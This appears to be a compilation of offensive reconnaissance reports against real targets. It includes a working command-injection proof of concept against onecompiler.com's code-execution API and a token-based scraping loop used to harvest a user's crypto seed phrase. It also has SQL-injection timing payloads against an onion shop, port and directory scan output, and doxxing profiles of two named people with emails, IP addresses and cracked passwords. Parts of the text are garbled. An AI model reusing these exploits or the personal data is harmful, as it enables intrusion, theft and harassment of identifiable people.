CYB3R4T REPORT

SUBJECT:
onecompiler.com
DATE:
06.03.2025

Critical Vulnerability: Command Injection in Code Execution API

1) Command Injection in API (JavaScript)

Result:

The execution reveals the AWS ECS (Elastic Container Service) environment:

```
uid=2345(coderunner)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
coderunner:x:2345:2345::/coderunner:/bin/sh
```

```
coderunnerw:x:2346:2346::/coderunner:/bin/sh
coderunnerwi:x:2347:2347::/coderunner:/bin/sh
```

2) Second Command Injection Scenario (Groovy)

PoC:

```
curl 'https://sandbox.onecompiler.com/api/code/exec' -X POST --insecure \
-H 'Content-Type: application/json' \
-d '{
  "name": "Groovy",
  "title": "Groovy Hello World",
  "mode": "groovy",
  "properties": {
    "language": "groovy",
    "files": [
        "name": "Main.groovy",
                                           "println new ProcessBuilder(\"ls\", \"-
                             "content":
la\").redirectErrorStream(true).start().text
      }
    1
  }
}'
```

3) Unprotected API Endpoints with Data Leakage

Vulnerable URLs:

User programs can be viewed by iterating over the programming language and username:

https://onecompiler.com/{programming_language}/{_id found in api/users/}

Example: https://onecompiler.com/mysql/437wjr3mg

Example of Mass Data Scraping:

```
for i in {1..50}; do
  curl 'https://onecompiler.com/api/posts/search' \
    -X POST --insecure \
    -H 'Authorization: Bearer YOUR_ACCESS_TOKEN' \
```

```
-H 'Content-Type: application/json' \
     '{"type":"code","page":'"$i"',"text":"<a href="KEYWORD","sortBy":"latest"}'</a>
     data.json
     done
                as a test, a user's seed phrase was taken using the KEYWORD
     "SEED." A balancé of $60 was found in Trust Wallet.
    API Endpoints:
     https://onecompiler.com/api/contact
                                                                                    # Support messages
 message": "I would like this removed please: https://onecompiler.com/python/3vbxuupre\n\nit contains real full names of me and all of my associates without our permission, we would want this re
"_id": "6027d3c9052lbfd88f5ff7a3",
"created": "2021-02-13T13:27:37.356Z",
"created": "2021-02-13T13:27:37.356Z",
"name": "William Gates",
"email": "William Gates",
"email": "William gate07@gmail.com",
"email": "William gate07@gmail.com",
"message": "Hi,\n\nNould you be interested in buying/owning the domain name compileone.com so you can redirect it to your website?\n\nKind regards,\n\nWilliam Gates\nDomain Name Broker\n'
"message": "Hi,\n\nNould you be interested in buying/owning the domain name compileone.com so you can redirect it to your website?\n\nKind regards,\n\nWilliam Gates\nDomain Name Broker\n'
"_id": "602d0fc9cced0adcd2cb0b23",
"created": "2021-02-17T12:44:57.253Z",
                                                                               # Feedback submissions
     https://onecompiler.com/api/feedback
     https://onecompiler.com/api/users
                                                                                    # User data
     " id": "43b28h2b4",
     "name": "JuanPablo",
     "picture": "https://static.onecompiler.com/images/blank-profile.png",
     "thumbnail": "https://static.onecompiler.com/images/blank-profile.png",
     "hidePicture": false,
     "created": "2025-03-06T19:10:10.395Z"
     "lastSeen": "2025-03-06T19:11:20.855Z
                                                                                    # API version (3.0.0)
     https://onecompiler.com/api/version
     https://onecompiler.com/api/tutorials # Tutorials
     https://onecompiler.com/api/code
                                                                                    # User programs
     https://onecompiler.com/api/subscriptions
                                                                                    # Subscription details
```

nternet.

https://onecompiler.com/api/time # Time data

https://onecompiler.com/api/country # Country info

https://onecompiler.com/api/questions # Questions section

https://onecompiler.com/api/ping # Joke

LEARNMEABITCOIN.COM

USERNAME: greg, in3rsha
 Адрес: Pine Media
 ФИО: Greg Walker

Регион: Belgravia House

Страна: 115 Rockingham Street

• gregwalker88@gmail.com

welshboygreg@hotmail.com

GOOGLE ID: 105008669897133159316

• Личный IP: 37.152.210.177, 137.44.1.200, 81.108.182.152,146.90.1.231,86.184.22.145

• ENCRYPTED PASSWORD:

\$2a\$08\$QxDIilFiRUpM/2SDuUpI1eCJ0.JLY97B9TGxdb7FQ4WKAhABH3ciO

- DECRYPTED PASSWORDS:
- <u>goat333, inersha, resident3, residents, tobasco, welshboygreg, thegregwalker, resident33, Goat333!</u>
- SOCIAL NETWORKS:
- https://trello.com/u/gregwalker4/activity
- https://twitter.com/in3rsha
- https://github.com/in3rsha
- https://www.reddit.com/user/in3rsha
- https://www.whoxy.com/email/821794
- и https://www.bigdomaindata.com/reverse-whois/?
 database=historical®istrant email wildcard=welshboygreg@hotmail.com*&sort by=create date зарегистрированные домены

Google Maps: <u>Greg Walker</u>Google+: <u>Greg Walker</u>

Trello: <u>gregwalker</u>
Twitter: <u>thegregwalker</u>

MyFitnessPal: gregwalker88
MySpace: @welshboygreg

• 162.120.69.182 - IP

HOSTING:

netname: CLOUVIDER-HB-CLIENT-7361

 address: London, UK address: EC2M 4YJ

phone: +442036035030

abuse-mailbox: abuse@clouvider.net

https://web.archive.org/web/20160622192315/http:/learnmeabitcoin.com/src/

• SSH.

• [*] 162.120.69.182 - Key Fingerprint: ssh-ed25519

AAAAC3NzaC1IZDI1NTE5AAAAIOw7gaQVNZ/hHktGBfMXo9tluJ83AiZe9ZPgQRLav1Ym

- [*] 162.120.69.182 SSH server version: SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.5
- [*] 162.120.69.182 Server Information and Encryption

Type Value Note encryption.compression none encryption.compression zlib@openssh.com encryption.encryption chacha20-poly1305@openssh.com encryption.encryption aes128-ctr encryption.encryption aes192-ctr encryption.encryption aes256-ctr encryption.encryption aes128-gcm@openssh.com encryption.encryption aes256-gcm@openssh.com umac-64-etm@openssh.com encryption.hmac encryption.hmac umac-128-etm@openssh.com hmac-sha2-256-etm@openssh.com encryption.hmac hmac-sha2-512-etm@openssh.com encryption.hmac encryption.hmac hmac-sha1-etm@openssh.com umac-64@openssh.com encryption.hmac encryption.hmac umac-128@openssh.com hmac-sha2-256 encryption.hmac encryption.hmac hmac-sha2-512 hmac-sha1 encryption.hmac encryption.host_key rsa-sha2-512 encryption.host_key rsa-sha2-256 encryption.host key ecdsa-sha2-nistp256 Weak elliptic curve encryption.host_key ssh-ed25519 encryption.key_exchange sntrup761x25519-sha512@openssh.com encryption.key_exchange curve25519-sha256 encryption.key exchange curve25519-sha256@libssh.org encryption.key_exchange ecdh-sha2-nistp256 encryption.key_exchange ecdh-sha2-nistp384 encryption.key_exchange ecdh-sha2-nistp521 encryption.key_exchange diffie-hellman-group-exchange-sha256 encryption.key exchange diffie-hellman-group16-sha512 encryption.key_exchange diffie-hellman-group18-sha512 encryption.key exchange diffie-hellman-group14-sha256 encryption.key_exchange ext-info-s encryption.key exchange kex-strict-s-v00@openssh.com fingerprint_db ssh.banner Ubuntu-3ubuntu13.5 openssh.comment 0.75 os.certainty os.cpe23 cpe:/o:canonical:ubuntu linux:os.family Linux os.product Linux

• service.family OpenSSH

Ubuntu

cpe:/a:openbsd:<u>openssh:9.6p1</u>

os.vendor

service.cpe23

service.product OpenSSH service.protocol ssh service.vendor OpenBSD service.version 9.6p1 https://learnmeabitcoin.com/.idea/workspace.xml - типо sitemap https://learnmeabitcoin.com/.idea/ - директории, можно перемещаться workspace.xml project file found at: /.idea/workspace.xml • Pattern found: open project version = "4"> https://162.120.69.182/assets/pdf/ - Скачивает страницы преобразует в pdf. https://162.120.69.182/assets/pdf/about/ https://learnmeabitcoin.com/errors/ - директории, можно перемещаться https://learnmeabitcoin.com/search/ https://learnmeabitcoin.com/beginners/guide/ https://learnmeabitcoin.com/.idea/ https://learnmeabitcoin.com/assets/ https://learnmeabitcoin.com/errors/ https://learnmeabitcoin.com/diagrams/png/ https://learnmeabitcoin.com/.idea/codeStyles/ https://learnmeabitcoin.com/technical/general/ https://learnmeabitcoin.com/assets/css/ https://learnmeabitcoin.com/assets/fonts/ https://learnmeabitcoin.com/assets/icons/ https://learnmeabitcoin.com/assets/icons/png/ https://learnmeabitcoin.com/technical/upgrades/ https://learnmeabitcoin.com/assets/js/ https://learnmeabitcoin.com/assets/jurassicpark/ https://learnmeabitcoin.com/assets/sitemap/ https://learnmeabitcoin.com/assets/svg/ /about (Status: 301) [Size: 242] [--> https://learnmeabitcoin.com/about/] /search (Status: 301) [Size: 243] [--> https://learnmeabitcoin.com/search/] (Status: 301) [Size: 246] [--> https://learnmeabitcoin.com/beginners/] /faq /cgi-bin (Status: 403) [Size: 22471] • /sitemap (Status: 301) [Size: 244] [--> https://learnmeabitcoin.com/sitemap/] (Status: 301) [Size: 262] [--> https://learnmeabitcoin.com/technical/#other-/resources resources] /tools (Status: 301) [Size: 242] [--> https://learnmeabitcoin.com/tools/]

(Status: 301) [Size: 243] [--> https://learnmeabitcoin.com/assets/]

(Status: 301) [Size: 255] [-->

https://learnmeabitcoin.com/about/#testimonials]

(Status: 403) [Size: 22467]

(Status: 301) [Size: 245] [--> https://learnmeabitcoin.com/technical]

(Status: 301) [Size: 243] [--> https://learnmeabitcoin.com/donate/] (Status: 301) [Size: 245] [--> https://learnmeabitcoin.com/template/]

/assets

/glossary

/donate

/src

/testimonials

/template

```
/dev (Status: 403) [Size: 22467]
```

/browser (Status: 301) [Size: 245] [--> https://learnmeabitcoin.com/explorer/]

/talks (Status: 301) [Size: 256] [-->

https://learnmeabitcoin.com/about/#presentations]

/open (Status: 301) [Size: 236] [--> https://learnmeabitcoin.com/]

/technical (Status: 301) [Size: 246] [--> https://learnmeabitcoin.com/technical/]
 /browsers (Status: 301) [Size: 245] [--> https://learnmeabitcoin.com/explorer/]

• /thanks (Status: 301) [Size: 242] [--> https://learnmeabitcoin.com/about/]

• /explorer (Status: 301) [Size: 245] [--> https://learnmeabitcoin.com/explorer/]

/errors (Status: 301) [Size: 243] [--> https://learnmeabitcoin.com/errors/]

/beginners (Status: 301) [Size: 246] [--> https://learnmeabitcoin.com/beginners/]
 /diagrams (Status: 301) [Size: 245] [--> https://learnmeabitcoin.com/diagrams/]

• /mining (Status: 301) [Size: 253] [--> https://learnmeabitcoin.com/technical/mining/]

• /browseresearch (Status: 301) [Size: 245] [--> https://learnmeabitcoin.com/explorer/]

 /publickey (Status: 301) [Size: 262] [--> https://learnmeabitcoin.com/technical/keys/public-key/]

/browserspy (Status: 301) [Size: 245] [--> https://learnmeabitcoin.com/explorer/]

/browsercheck (Status: 301) [Size: 245] [--> https://learnmeabitcoin.com/explorer/]

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- AS20473
- AS51852
- AS62240
- AS8943
- AS9123

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- [*] Interesting Urls found: 9
- _____
- http://learnmeabitcoin.com/
- https://commento.learnmeabitcoin.com/login
- https://learnmeabitcoin.com/
- https://learnmeabitcoin.com/beginners/blocks
- https://learnmeabitcoin.com/explorer/address/1BgGZ9tcN4rm9KBzDn7KprQz87SZ26SAMH
- https://learnmeabitcoin.com/guide/coinbase-transaction
- https://learnmeabitcoin.com/technical/block/
- https://learnmeabitcoin.com/technical/mnemonic
- https://learnmeabitcoin.com/technical/networking/magic-bytes/
- [*] IPs found: 10
- ------
- 107.182.163.162
- 147.45.141.87
- 162.120.69.182
- 31.7.60.178
- 45.144.112.208
- 46.19.137.74
- 64.176.221.94
- 85.119.83.25

IP Address	Port	Time (ms)	Status	Authorization	Server name / Realm name / Device type Rac
107. 182. 163. 162	80	140	Done		BunnyCDN-OG1-877 (BunnyCDN - Node OG1-877)
107. 182. 163. 162	22	157	Can't load main page		
107. 182. 163. 162	443	141	phpMyAdmin scan		BunnyCDN-OG1-877 (BunnyCDN - Node OG1-877)
147.45.141.254	80	16	Done		nginx/1.18.0 (Ubuntu) (404 Not Found)
147.45.141.254	22	15	Can't load main page		
147.45.141.254	443	15	Done		nginx/1.18.0 (Ubuntu) (Загрузка)
162.120.69.182	22	94	Can't load main page		
162.120.69.182	80	110	phpMyAdmin scan		Apache (Learn Me A Bitcoin (By Greg Walker))
162.120.69.182	443	125	phpMyAdmin scan		Apache (Learn Me A Bitcoin (By Greg Walker))
31.7.60.178	80	94	phpMyAdmin scan		Apache/2.4.41 (Ubuntu) (BitcoinPaths.com - Find Connections
31.7.60.178	443	94	phpMyAdmin scan		Apache/2.4.41 (Ubuntu) (BitcoinPaths.com - Find Connections
31.7.60.178	22	172	Can't load main page		
31.7.60.254	22	172	Can't load main page		
64.176.221.94	80	141	Done		nginx
64.176.221.94	22	140	Can't load main page		
64.176.221.94	443	140	phpMyAdmin scan		nginx
64.176.221.254	80	141	phpMyAdmin scan		Caddy (UniFi Network)
64.176.221.254	22	140	Can't load main page		
64.176.221.254	8080	140	phpMyAdmin scan		Caddy (UniFi Network)
64.176.221.254	443	157	phpMyAdmin scan		Caddy (UniFi Network)
85.119.83.25	80	47	Done		nginx/1.18.0 (Ubuntu) (Bitcoin Rain Live Transaction Rate Vi
85.119.83.25	22	47	Can't load main page		

• [*] Hosts found: 7

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- commento.learnmeabitcoin.com
- commento.learnmeabitcoin.com:46.19.137.74
- neo4j.learnmeabitcoin.com
- old.learnmeabitcoin.com
- static.learnmeabitcoin.com
- vps.learnmeabitcoin.com
- vps.learnmeabitcoin.com:85.119.83.25

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CVE-2005-3299 - не работает, я пробовал.

IBSERVICE REPORT

SUBJECT:	<u>awazonhndi7e5yfaobpk7j2tsnp4</u> <u>kfd2xa63tdtzcg7plc5fka4il4ad</u>	DATE:	03.03.2025	<u> </u>

General Information about the Target

Target IP: 224.0.0.1

Target Hostname:

awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc5fka4il4ad.onion

Target Port: 80 Server: nginx

The main web resource ("/") redirects to the login page:

http://awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc5fka4il4ad.onion/auth/login

Discovered Vulnerabilities and Observations

1. SQL Injection Vulnerabilities (9)

Vulnerability Type: SQL Injection

Risk Level: High

Description: Multiple SQL injection vulnerabilities were identified within the web application at the following endpoints:

- /auth/register affecting default_language, honeypot, and repeat_withdrawal_pin parameters.
- /auth/reset-password affecting the honeypot parameter.
- /toggle-theme affecting the 7if6ttcnzvP9u6hF5Fia parameter.

The vulnerabilities arise from the improper validation and sanitization of user-controlled inputs that are incorporated directly into SQL queries. By manipulating inputs with time-based payloads like randomblob(), it was possible to influence query execution times, strongly indicating that the application is susceptible to SQL injection.

Examples:

- default_language Parameter
 - o Original query execution time with value [de]: 433 ms

- Modified query using randomblob(1000000): 1,908 ms
- honeypot Parameter (on /auth/reset-password)
 - o Original: 655 ms
 - Modified with randomblob(10000000): 825 ms
- 7if6ttcnzvP9u6hF5Fia Parameter (on /toggle-theme)
 - o Original: 721 ms
 - Modified with randomblob(1000000): 980 ms

Risk Assessment: Exploitation of these vulnerabilities may allow an attacker to:

- Extract sensitive data from the database (e.g., usernames, passwords, credit card information).
- Bypass authentication mechanisms.
- Delete or modify database records.
- Execute arbitrary SQL commands.

Recommendations:

- 1. Input Validation: Implement strict server-side validation of all inputs. Avoid relying solely on client-side controls.
- 2. Prepared Statements: Use parameterized queries or prepared statements to handle user inputs safely.
- 3. Least Privilege Principle: Ensure the database user account used by the application has only the necessary permissions.
- 4. Dynamic SQL Avoidance: Refrain from constructing SQL queries via string concatenation.
- 5. Escape Inputs: Implement proper escaping techniques for user-provided data.

References:

• OWASP SQL Injection Prevention Cheat Sheet

2. Authentication Request Identified

- URL: Authentication Endpoint
- Description: An authentication request has been detected. The request includes identifiable authentication parameters, as indicated by the following key-value pairs:
 - userParam: usernameuserValue: CgNKDHus
 - o passwordParam: password
 - o referer:
 - http://awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc5fka4i14ad.onion/auth/login
- Risk: If not properly secured, the exposed authentication parameters can be leveraged by an attacker to conduct credential stuffing, brute-force attacks, or session hijacking.
- Recommendation:
 - 1. Implement rate-limiting and account lockout mechanisms to mitigate brute-force attacks.

- 2. Ensure sensitive data like usernames and passwords are transmitted over encrypted channels (TLS).
- 3. Validate and sanitize all user inputs to prevent injection attacks.
- 4. Implement multi-factor authentication (MFA).
- References:
 - **OWASP Authentication Cheat Sheet**

3. Session Management Response Identified

- URL: <u>Homepage</u>
- Session Parameter: EWsMVjIa4EGHKKWIZNC2
- Description: The response contains a session management token. This token is used for maintaining session state and can be manipulated if not properly secured.
- Risk: Poor session management can lead to session fixation, session hijacking, and unauthorized access to user accounts.
- Recommendation:
 - 1. Ensure session tokens are securely generated using strong random values.
 - 2. Implement secure cookie attributes: HttpOnly, Secure, and SameSite.
 - 3. Invalidate sessions on logout and implement session timeout mechanisms.
 - 4. Use token binding or other mechanisms to tie sessions to specific client contexts.
- References:
 - o OWASP Session Management Cheat Sheet

Both vulnerabilities were identified using OWASP ZAP's Authentication Helper:

- Authentication Request Identification
- Session Management Identification

IBSERVICE REPORT

SUBJECT:	<u>awazonhndi7e5yfaobpk7j2tsnp4</u> <u>kfd2xa63tdtzcg7plc5fka4il4ad</u>	DATE:	01.03.2025	<u> </u>

General Information about the Target

Target IP: 224.0.0.1

Target Hostname:

awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc5fka4il4ad.onion

Target Port: 80 Server: nginx

The main web resource ("/") redirects to the login page:

http://awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc5fka4il4ad.onion/a

uth/login

Discovered Vulnerabilities and Observations

Detailed Vulnerability Report

1) X-Content-Type-Options Header Missing

URL:

http://awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc5fka4il4ad.onion/robots.txt

Parameter: x-content-type-options

Description: The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing it to be interpreted as a different content type than declared. This issue also applies to error pages (401, 403, 500, etc.), which may still be affected by injection vulnerabilities.

Risk: Medium

Solution: Ensure the application/web server sets the Content-Type header appropriately and includes X-Content-Type-Options: nosniff for all responses.

References:

- Microsoft Documentation
- OWASP Security Headers

2) Information Disclosure via Base64 Encoding

URL: http://awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc5fka4il4ad.onion/

Evidence:

iVBORwØKGgoAAAANSUhEUgAAAMgAAAA8CAIAAACsOWLGAAAACXBIWXMAAA7EAAAOxAGVKw4bAA AEjØ1EQVR4n01cba7jIAzkSXuj3ome6fVMzZmyP9JHXJwQY2y+4miFR1VKbDMeprRvf/zv+1oW 55xzzj8ehg2LY0f82/+u4...

Other Info: Detected \x89PNG\r\n\x1A header indicating a PNG file.

Risk: Low

Solution: Manually verify that Base64-encoded data does not expose sensitive

information. Ensure such data cannot be leveraged to exploit other vulnerabilities.

References:

• **OWASP Information Leakage**

3) Authentication Request Identified

URL:

http://awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc5fka4il4ad.onion/auth/login

Parameter: username

Other Info:

userParam=username

userValue=

passwordParam=password

Risk: Medium

Solution: Ensure that authentication endpoints are properly secured against brute force attacks and that sensitive data is transmitted securely using HTTPS.

4) Sec-Fetch-Dest Header is Missing

URL:

http://awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc5fka4il4ad.onion/robots.txt

Parameter: Sec-Fetch-Dest

Description: The Sec-Fetch-Dest header is missing, which can affect how the browser processes and requests resources. This header helps prevent cross-site leaks by specifying how the requested resource should be used.

Risk: Low

Solution: Ensure that Sec-Fetch-Dest is included in request headers.

References:

MDN: Sec-Fetch-Dest

- MDN: Sec-Fetch-Site
- MDN: Sec-Fetch-Mode

5) User Agent Fuzzer

Parameter: User-Agent

Description: Variations in response based on different User-Agent strings indicate that different content is served to different user agents. This can reveal hidden functionality or security flaws when responses differ for specific user agents.

Risk: Medium

Solution: Implement proper request validation and ensure that user-agent-based filtering does not expose unintended content or behaviors.

Technology Identified

URL: http://awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc5fka4il4ad.onion/

Detected Tech: Nginx

CPE: cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*

6) Technology Detected - Cart Functionality

• URL:

http://awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc 5fka4i14ad.onion/product/97176d1141caØ3f58c3bead33359 986c5Ø12

- Risk Level: Informational
- Description:
 - The application uses an ecommerce cart functionality, which indicates it likely supports checkout and payment processing.
 This could be relevant for further security assessments.
- References:
 - Wappalyzer Cart Functionality

3) SQL Injection - SQLite (Critical Issue) 100%

• URL:

http://awazonhndi7e5yfaobpk7j2tsnp4kfd2xa63tdtzcg7plc5fka4i14ad.onion/auth/login

- Parameter: password
- Attack: case randomblob(10000000) when not null then 1 else 1 end
- Risk Level: Critical

• Evidence:

- The query execution time was manipulated using different payloads:
 - case randomblob(10000000) when not null then 1 else 1 end: Response time 535ms
 - case randomblob(100000000) when not null then 1 else 1 end: Response time 853ms
 - Baseline query response time with 123123123: 557ms

• Description:

 The presence of a SQL Injection vulnerability allows attackers to manipulate SQL queries, extract data, and potentially gain unauthorized access to the database.

Solution:

- Never trust client-side input, even with client-side validation.
- Use server-side input validation and prepared statements:
 - In JDBC, use PreparedStatement or CallableStatement with parameterized queries.
 - In ASP, use ADO Command Objects with strong type checking.
- Avoid dynamic SQL query construction with string concatenation.
- Use stored procedures where possible but do not concatenate SQL within them.
- Implement the principle of least privilege by restricting database user permissions.

• References:

OWASP: SQL Injection Prevention Cheat Sheet

Эминов Руслан Габилович

Дата рождения: 20 декабря 1995 года

Место рождения: дер. Жуковка

Телефон: iPhone

Email: officialinoff@gmail.com, rusa_I5@mail.ru

ІР-адрес: 89. 108. 106. 50 (последнее замечание в России)

Пароли:

rusa_I5@mail.ru: tweeterI0I, I234jaee8ch, II22335, II223351, II223355, I234jaee8Ch,

4795536, YQg4WDFRaw, hmnsBP, rusa_I6, zxcvbnm

officialinoff@gmail.com: II22335, hmnsBP

Личная информация

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Дата регистрации: 28 июня 2021 года, 12:59:53

Социальные сети и ссылки

Facebook: facebook.com/profile.php?id=I00002263476607

Instagram: www.instagram.com/in_off official

VK I: vk.com/idI90592883 VK 2: vk.com/id262I9996

TikTok: www.tiktok.com/@in_off_official

Mail.ru: my.mail.ru/mail.ru/rusa_I5

Twitter: twitter.com/rusa 095

Mamba: mamba.ru/ru/profile/580659I48

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